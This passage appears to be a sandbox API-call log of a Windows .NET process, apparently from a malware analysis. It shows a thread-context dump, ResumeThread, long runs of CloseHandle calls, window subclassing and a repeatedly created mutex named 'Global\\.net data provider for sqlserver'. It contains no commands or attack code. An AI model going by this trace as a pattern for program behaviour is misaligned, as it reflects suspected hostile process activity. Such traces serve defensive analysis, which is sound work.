[31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x405907, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0183.806] ResumeThread (hThread=0x131c0) returned 0x1 [0184.004] CoGetContextToken (in: pToken=0x4de1d8 | out: pToken=0x4de1d8) returned 0x0 [0184.004] CObjectContext::QueryInterface () returned 0x0 [0184.004] CObjectContext::GetCurrentThreadType () returned 0x0 [0184.004] Release () returned 0x0 [0184.005] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x13880, cHandles=0x1, pHandles=0x75ae88*=0xa8, lpdwindex=0x4de07c | out: lpdwindex=0x4de07c) returned 0x0 Thread: id = 148 os_tid = 0x314 Thread: id = 149 os_tid = 0x5b4 [0154.337] CoGetContextToken (in: pToken=0x448f97c | out: pToken=0x448f97c) returned 0x800401f0 [0154.337] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0174.778] CloseHandle (hObject=0x2a0) returned 1 [0174.780] CloseHandle (hObject=0x29c) returned 1 [0174.780] CloseHandle (hObject=0x298) returned 1 [0174.781] CloseHandle (hObject=0x294) returned 1 [0174.781] CloseHandle (hObject=0x2cc) returned 1 [0174.781] CloseHandle (hObject=0x2c0) returned 1 [0174.781] CloseHandle (hObject=0x290) returned 1 [0174.781] CloseHandle (hObject=0x2bc) returned 1 [0174.781] CloseHandle (hObject=0x28c) returned 1 [0174.782] CloseHandle (hObject=0x288) returned 1 [0174.782] CloseHandle (hObject=0x2b8) returned 1 [0174.782] CloseHandle (hObject=0x2c4) returned 1 [0174.782] CloseHandle (hObject=0x2b4) returned 1 [0174.782] CloseHandle (hObject=0x284) returned 1 [0174.782] CloseHandle (hObject=0x280) returned 1 [0174.782] CloseHandle (hObject=0x2b0) returned 1 [0174.783] CloseHandle (hObject=0x27c) returned 1 [0174.783] CloseHandle (hObject=0x278) returned 1 [0174.783] CloseHandle (hObject=0x2ac) returned 1 [0174.783] CloseHandle (hObject=0x268) returned 1 [0174.783] CloseHandle (hObject=0x274) returned 1 [0174.784] CloseHandle (hObject=0x2a8) returned 1 [0174.784] CloseHandle (hObject=0x270) returned 1 [0174.784] CloseHandle (hObject=0x2a4) returned 1 [0179.442] CloseHandle (hObject=0x1340c) returned 1 [0179.442] CloseHandle (hObject=0xb8c) returned 1 [0179.442] CloseHandle (hObject=0x33a8) returned 1 [0179.442] CloseHandle (hObject=0x2e98) returned 1 [0179.442] CloseHandle (hObject=0x10850) returned 1 [0179.442] CloseHandle (hObject=0x1790) returned 1 [0179.442] CloseHandle (hObject=0x1e94) returned 1 [0179.442] CloseHandle (hObject=0xa460) returned 1 [0179.442] CloseHandle (hObject=0x44e4) returned 1 [0179.442] CloseHandle (hObject=0xff28) returned 1 [0179.443] CloseHandle (hObject=0xac90) returned 1 [0179.443] CloseHandle (hObject=0x100a0) returned 1 [0179.443] CloseHandle (hObject=0x43b8) returned 1 [0179.443] CloseHandle (hObject=0x125f8) returned 1 [0179.443] CloseHandle (hObject=0x5a8) returned 1 [0179.443] CloseHandle (hObject=0x1cd8) returned 1 [0179.443] CloseHandle (hObject=0xc950) returned 1 [0179.443] CloseHandle (hObject=0xb988) returned 1 [0179.443] CloseHandle (hObject=0xf560) returned 1 [0179.443] CloseHandle (hObject=0x10a00) returned 1 [0179.443] CloseHandle (hObject=0xbe78) returned 1 [0179.443] CloseHandle (hObject=0x55bc) returned 1 [0179.443] CloseHandle (hObject=0x474) returned 1 [0179.444] CloseHandle (hObject=0x10aa0) returned 1 [0179.444] CloseHandle (hObject=0xcfac) returned 1 [0179.444] CloseHandle (hObject=0x20ec) returned 1 [0179.444] CloseHandle (hObject=0x2bd8) returned 1 [0179.444] CloseHandle (hObject=0xb630) returned 1 [0179.444] CloseHandle (hObject=0x2fbc) returned 1 [0179.444] CloseHandle (hObject=0x3b88) returned 1 [0179.444] CloseHandle (hObject=0x10460) returned 1 [0179.444] CloseHandle (hObject=0x560c) returned 1 [0179.444] CloseHandle (hObject=0x4c4) returned 1 [0179.444] CloseHandle (hObject=0x3010) returned 1 [0179.444] CloseHandle (hObject=0xfdf4) returned 1 [0179.445] CloseHandle (hObject=0x123b0) returned 1 [0179.445] CloseHandle (hObject=0x39b0) returned 1 [0179.445] CloseHandle (hObject=0x4ec) returned 1 [0179.445] CloseHandle (hObject=0xb5a0) returned 1 [0179.445] CloseHandle (hObject=0x43f0) returned 1 [0179.445] CloseHandle (hObject=0xfe0c) returned 1 [0179.445] CloseHandle (hObject=0x1700) returned 1 [0179.445] CloseHandle (hObject=0xaf4) returned 1 [0179.445] CloseHandle (hObject=0x1218) returned 1 [0179.445] CloseHandle (hObject=0x3e88) returned 1 [0179.445] CloseHandle (hObject=0x109d4) returned 1 [0179.445] CloseHandle (hObject=0x5044) returned 1 [0179.445] CloseHandle (hObject=0x10930) returned 1 [0179.445] CloseHandle (hObject=0x259c) returned 1 [0179.446] CloseHandle (hObject=0x10a6c) returned 1 [0179.446] CloseHandle (hObject=0x36b0) returned 1 [0179.446] CloseHandle (hObject=0x473c) returned 1 [0179.446] CloseHandle (hObject=0x7d4) returned 1 [0179.446] CloseHandle (hObject=0xca30) returned 1 [0179.446] CloseHandle (hObject=0x12474) returned 1 [0179.446] CloseHandle (hObject=0x4d04) returned 1 [0179.446] CloseHandle (hObject=0xcb34) returned 1 [0179.446] CloseHandle (hObject=0x50e8) returned 1 [0179.446] CloseHandle (hObject=0x2e90) returned 1 [0179.446] CloseHandle (hObject=0x59a4) returned 1 [0179.446] CloseHandle (hObject=0xad6c) returned 1 [0179.447] CloseHandle (hObject=0x423c) returned 1 [0179.447] CloseHandle (hObject=0x2b18) returned 1 [0179.447] CloseHandle (hObject=0x10608) returned 1 [0179.447] CloseHandle (hObject=0x4c20) returned 1 [0179.447] CloseHandle (hObject=0x13c2c) returned 1 [0179.447] CloseHandle (hObject=0x2fc0) returned 1 [0179.447] CloseHandle (hObject=0x27c8) returned 1 [0179.447] CloseHandle (hObject=0xf9e4) returned 1 [0179.447] CloseHandle (hObject=0x12064) returned 1 [0179.447] CloseHandle (hObject=0x3ae4) returned 1 [0179.447] CloseHandle (hObject=0x1960) returned 1 [0179.447] CloseHandle (hObject=0x126a8) returned 1 [0179.448] CloseHandle (hObject=0x42e4) returned 1 [0179.448] CloseHandle (hObject=0x5028) returned 1 [0179.448] CloseHandle (hObject=0x2fa8) returned 1 [0179.448] CloseHandle (hObject=0x2b50) returned 1 [0179.448] CloseHandle (hObject=0x347c) returned 1 [0179.448] CloseHandle (hObject=0x13590) returned 1 [0179.448] CloseHandle (hObject=0xb1c8) returned 1 [0179.448] CloseHandle (hObject=0x3b0c) returned 1 [0179.448] CloseHandle (hObject=0xc9a8) returned 1 [0179.448] CloseHandle (hObject=0x2940) returned 1 [0179.448] CloseHandle (hObject=0x2bc0) returned 1 [0179.448] CloseHandle (hObject=0x127d4) returned 1 [0179.448] CloseHandle (hObject=0x3b20) returned 1 [0179.448] CloseHandle (hObject=0xa804) returned 1 [0179.449] CloseHandle (hObject=0x1c28) returned 1 [0179.449] CloseHandle (hObject=0xb634) returned 1 [0179.449] CloseHandle (hObject=0x5180) returned 1 [0179.449] CloseHandle (hObject=0x425c) returned 1 [0179.449] CloseHandle (hObject=0x5558) returned 1 [0179.449] CloseHandle (hObject=0x123a0) returned 1 [0179.449] CloseHandle (hObject=0x1dc8) returned 1 [0179.449] CloseHandle (hObject=0x1768) returned 1 [0179.449] CloseHandle (hObject=0x39f8) returned 1 [0179.449] CloseHandle (hObject=0xf6dc) returned 1 [0179.449] CloseHandle (hObject=0x101a0) returned 1 [0179.449] CloseHandle (hObject=0xf574) returned 1 [0179.450] CloseHandle (hObject=0xac70) returned 1 [0179.450] CloseHandle (hObject=0x472c) returned 1 [0179.450] CloseHandle (hObject=0xa74) returned 1 [0179.450] CloseHandle (hObject=0x1884) returned 1 [0179.450] CloseHandle (hObject=0x5808) returned 1 [0179.450] CloseHandle (hObject=0x1ab0) returned 1 [0179.450] CloseHandle (hObject=0x10a08) returned 1 [0179.450] CloseHandle (hObject=0x3014) returned 1 [0179.450] CloseHandle (hObject=0x2c60) returned 1 [0179.450] CloseHandle (hObject=0x27a8) returned 1 [0179.450] CloseHandle (hObject=0x391c) returned 1 [0179.450] CloseHandle (hObject=0x3754) returned 1 [0179.450] CloseHandle (hObject=0x125d0) returned 1 [0179.451] CloseHandle (hObject=0x4b98) returned 1 [0179.451] CloseHandle (hObject=0xb6b0) returned 1 [0179.451] CloseHandle (hObject=0xc564) returned 1 [0179.451] CloseHandle (hObject=0x1a90) returned 1 [0179.451] CloseHandle (hObject=0xb8b8) returned 1 [0179.451] CloseHandle (hObject=0x5bfc) returned 1 [0179.451] CloseHandle (hObject=0xf744) returned 1 [0179.451] CloseHandle (hObject=0xb19c) returned 1 [0179.451] CloseHandle (hObject=0x23a0) returned 1 [0179.451] CloseHandle (hObject=0xc1ec) returned 1 [0179.451] CloseHandle (hObject=0x10688) returned 1 [0179.451] CloseHandle (hObject=0xee0) returned 1 [0179.451] CloseHandle (hObject=0xac60) returned 1 [0179.452] CloseHandle (hObject=0x2e8c) returned 1 [0179.452] CloseHandle (hObject=0x303c) returned 1 [0179.452] CloseHandle (hObject=0x1780) returned 1 [0179.452] CloseHandle (hObject=0x4040) returned 1 [0179.452] CloseHandle (hObject=0x1318) returned 1 [0179.452] CloseHandle (hObject=0x10838) returned 1 [0179.452] CloseHandle (hObject=0x5830) returned 1 [0179.452] CloseHandle (hObject=0x1a10) returned 1 [0179.452] CloseHandle (hObject=0x1338) returned 1 [0179.452] CloseHandle (hObject=0x5b88) returned 1 [0179.452] CloseHandle (hObject=0x135b4) returned 1 [0179.452] CloseHandle (hObject=0x3050) returned 1 [0179.453] CloseHandle (hObject=0x1a38) returned 1 [0179.453] CloseHandle (hObject=0x140ac) returned 1 [0179.453] CloseHandle (hObject=0xc778) returned 1 [0179.453] CloseHandle (hObject=0x3ab8) returned 1 [0179.453] CloseHandle (hObject=0x13d04) returned 1 [0179.453] CloseHandle (hObject=0x52c0) returned 1 [0179.453] CloseHandle (hObject=0xae8c) returned 1 [0179.453] CloseHandle (hObject=0xca3c) returned 1 [0179.453] CloseHandle (hObject=0x18c8) returned 1 [0179.453] CloseHandle (hObject=0x12068) returned 1 [0179.453] CloseHandle (hObject=0x22ac) returned 1 [0179.453] CloseHandle (hObject=0x22a8) returned 1 [0179.454] CloseHandle (hObject=0x4138) returned 1 [0179.454] CloseHandle (hObject=0xbe44) returned 1 [0179.454] CloseHandle (hObject=0x13c3c) returned 1 [0179.454] CloseHandle (hObject=0x13d30) returned 1 [0179.454] CloseHandle (hObject=0x15a4) returned 1 [0179.454] CloseHandle (hObject=0x2b80) returned 1 [0179.454] CloseHandle (hObject=0x34ac) returned 1 [0179.454] CloseHandle (hObject=0x4fd0) returned 1 [0179.454] CloseHandle (hObject=0xf5c) returned 1 [0179.454] CloseHandle (hObject=0xa558) returned 1 [0179.454] CloseHandle (hObject=0x2cb4) returned 1 [0179.454] CloseHandle (hObject=0x36e4) returned 1 [0179.454] CloseHandle (hObject=0x5c4c) returned 1 [0179.455] CloseHandle (hObject=0x4fb4) returned 1 [0179.455] CloseHandle (hObject=0x4fe0) returned 1 [0179.455] CloseHandle (hObject=0x1df8) returned 1 [0179.455] CloseHandle (hObject=0x5304) returned 1 [0179.455] CloseHandle (hObject=0x4528) returned 1 [0179.455] CloseHandle (hObject=0xa9f0) returned 1 [0179.455] CloseHandle (hObject=0x50c) returned 1 [0179.455] CloseHandle (hObject=0x5498) returned 1 [0179.455] CloseHandle (hObject=0x50dc) returned 1 [0179.455] CloseHandle (hObject=0xfc48) returned 1 [0179.455] CloseHandle (hObject=0x10b38) returned 1 [0179.455] CloseHandle (hObject=0x135bc) returned 1 [0179.456] CloseHandle (hObject=0xff24) returned 1 [0179.456] CloseHandle (hObject=0xaaa0) returned 1 [0179.456] CloseHandle (hObject=0x2304) returned 1 [0179.456] CloseHandle (hObject=0x2c30) returned 1 [0179.456] CloseHandle (hObject=0xa9bc) returned 1 [0179.456] CloseHandle (hObject=0x1e08) returned 1 [0179.456] CloseHandle (hObject=0x23f0) returned 1 [0179.456] CloseHandle (hObject=0xb21c) returned 1 [0179.456] CloseHandle (hObject=0xac28) returned 1 [0179.456] CloseHandle (hObject=0x3d50) returned 1 [0179.456] CloseHandle (hObject=0x43f8) returned 1 [0179.456] CloseHandle (hObject=0x12518) returned 1 [0179.456] CloseHandle (hObject=0x284c) returned 1 [0179.457] CloseHandle (hObject=0x24e0) returned 1 [0179.457] CloseHandle (hObject=0x11e0c) returned 1 [0179.457] CloseHandle (hObject=0xb9a8) returned 1 [0179.457] CloseHandle (hObject=0x3a48) returned 1 [0179.457] CloseHandle (hObject=0xaaf8) returned 1 [0179.457] CloseHandle (hObject=0xbe98) returned 1 [0179.457] CloseHandle (hObject=0x140bc) returned 1 [0179.457] CloseHandle (hObject=0x5c58) returned 1 [0179.457] CloseHandle (hObject=0xb4ec) returned 1 [0179.457] CloseHandle (hObject=0x1c80) returned 1 [0179.457] CloseHandle (hObject=0x212c) returned 1 [0179.457] CloseHandle (hObject=0xc87c) returned 1 [0179.457] CloseHandle (hObject=0x4e6c) returned 1 [0179.458] CloseHandle (hObject=0x1704) returned 1 [0179.458] CloseHandle (hObject=0x1c94) returned 1 [0179.458] CloseHandle (hObject=0x211c) returned 1 [0179.458] CloseHandle (hObject=0x127b8) returned 1 [0179.458] CloseHandle (hObject=0xa6c8) returned 1 [0179.458] CloseHandle (hObject=0xf970) returned 1 [0179.458] CloseHandle (hObject=0x20e8) returned 1 [0179.458] CloseHandle (hObject=0x13d6c) returned 1 [0179.458] CloseHandle (hObject=0x3a30) returned 1 [0179.458] CloseHandle (hObject=0xf640) returned 1 [0179.458] CloseHandle (hObject=0x36c4) returned 1 [0179.458] CloseHandle (hObject=0x2cd4) returned 1 [0179.458] CloseHandle (hObject=0x4b60) returned 1 [0179.458] CloseHandle (hObject=0x1804) returned 1 [0179.459] CloseHandle (hObject=0x13d14) returned 1 [0179.459] CloseHandle (hObject=0x4770) returned 1 [0179.459] CloseHandle (hObject=0x1220) returned 1 [0179.459] CloseHandle (hObject=0x53f8) returned 1 [0179.459] CloseHandle (hObject=0xf9fc) returned 1 [0179.459] CloseHandle (hObject=0xbc44) returned 1 [0179.459] CloseHandle (hObject=0x4a3c) returned 1 [0179.459] CloseHandle (hObject=0xb4e0) returned 1 [0179.459] CloseHandle (hObject=0x10650) returned 1 [0179.459] CloseHandle (hObject=0xab24) returned 1 [0179.459] CloseHandle (hObject=0x858) returned 1 [0179.459] CloseHandle (hObject=0xc7f8) returned 1 [0179.459] CloseHandle (hObject=0xb09c) returned 1 [0179.460] CloseHandle (hObject=0x11e2c) returned 1 [0179.460] CloseHandle (hObject=0x593c) returned 1 [0179.460] CloseHandle (hObject=0x10b2c) returned 1 [0179.460] CloseHandle (hObject=0x5d8) returned 1 [0179.460] CloseHandle (hObject=0x2ed0) returned 1 [0179.460] CloseHandle (hObject=0x13bc) returned 1 [0179.460] CloseHandle (hObject=0x22bc) returned 1 [0179.460] CloseHandle (hObject=0xb6f0) returned 1 [0179.460] CloseHandle (hObject=0x12144) returned 1 [0179.460] CloseHandle (hObject=0x13c58) returned 1 [0179.460] CloseHandle (hObject=0x38dc) returned 1 [0179.460] CloseHandle (hObject=0x16f0) returned 1 [0179.460] CloseHandle (hObject=0x4e98) returned 1 [0179.461] CloseHandle (hObject=0x628) returned 1 [0179.461] CloseHandle (hObject=0xfafc) returned 1 [0179.461] CloseHandle (hObject=0x2a8) returned 1 [0179.461] CloseHandle (hObject=0x1cc0) returned 1 [0179.461] CloseHandle (hObject=0xc24c) returned 1 [0179.461] CloseHandle (hObject=0x650) returned 1 [0179.461] CloseHandle (hObject=0x1908) returned 1 [0179.461] CloseHandle (hObject=0x56cc) returned 1 [0179.461] CloseHandle (hObject=0x53b4) returned 1 [0184.053] SetWindowLongW (hWnd=0x10156, nIndex=-4, dwNewLong=1996301789) returned 80218302 [0184.054] SetClassLongW (hWnd=0x10156, nIndex=-24, dwNewLong=1996301789) returned 0x4c80896 [0184.054] PostMessageW (hWnd=0x10156, Msg=0x10, wParam=0x0, lParam=0x0) returned 1 [0184.055] GetModuleHandleW (lpModuleName=0x0) returned 0x20000 [0184.055] UnregisterClassW (lpClassName="WindowsForms10.Window.8.app.0.3917f2_r14_ad1", hInstance=0x20000) returned 0 [0184.057] LocalFree (hMem=0x7a8820) returned 0x0 [0184.057] LocalFree (hMem=0x7a8798) returned 0x0 [0184.058] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x24b0048, cbSid=0x448f74c | out: pSid=0x24b0048*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x448f74c) returned 1 [0184.058] CreateMutexW (lpMutexAttributes=0x24b0124, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0xaf28 [0184.058] WaitForSingleObject (hHandle=0xaf28, dwMilliseconds=0x1f4) returned 0x0 [0184.058] ReleaseMutex (hMutex=0xaf28) returned 1 [0184.058] CloseHandle (hObject=0xaf28) returned 1 [0184.058] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x24b0340, cbSid=0x448f74c | out: pSid=0x24b0340*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x448f74c) returned 1 [0184.058] CreateMutexW (lpMutexAttributes=0x24b041c, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0xaf28 [0184.058] WaitForSingleObject (hHandle=0xaf28, dwMilliseconds=0x1f4) returned 0x0 [0184.059] ReleaseMutex (hMutex=0xaf28) returned 1 [0184.059] CloseHandle (hObject=0xaf28) returned 1 [0184.059] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x24b0638, cbSid=0x448f74c | out: pSid=0x24b0638*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x448f74c) returned 1 [0184.059] CreateMutexW (lpMutexAttributes=0x24b0714, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0xaf28 [0184.059] WaitForSingleObject (hHandle=0xaf28, dwMilliseconds=0x1f4) returned 0x0 [0184.059] ReleaseMutex (hMutex=0xaf28) returned 1 [0184.059] CloseHandle (hObject=0xaf28) returned 1 [0184.059] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x24b0930, cbSid=0x448f74c | out: pSid=0x24b0930*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x448f74c) returned 1 [0184.059] CreateMutexW (lpMutexAttributes=0x24b0a0c, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0xaf28 [0184.059] WaitForSingleObject (hHandle=0xaf28, dwMilliseconds=0x1f4) returned 0x0 [0184.059] ReleaseMutex (hMutex=0xaf28) returned 1 [0184.059] CloseHandle (hObject=0xaf28) returned 1 [0184.059] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x24b0c28, cbSid=0x448f74c | out: pSid=0x24b0c28*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x448f74c) returned 1 [0184.060] CreateMutexW (lpMutexAttributes=0x24b0d04, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0xaf28 [0184.060] WaitForSingleObject (hHandle=0xaf28, dwMilliseconds=0x1f4) returned 0x0 [0184.060] ReleaseMutex (hMutex=0xaf28) returned 1 [0184.060] CloseHandle (hObject=0xaf28) returned 1 [0184.060] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x24b0f20, cbSid=0x448f74c | out: pSid=0x24b0f20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x448f74c) returned 1 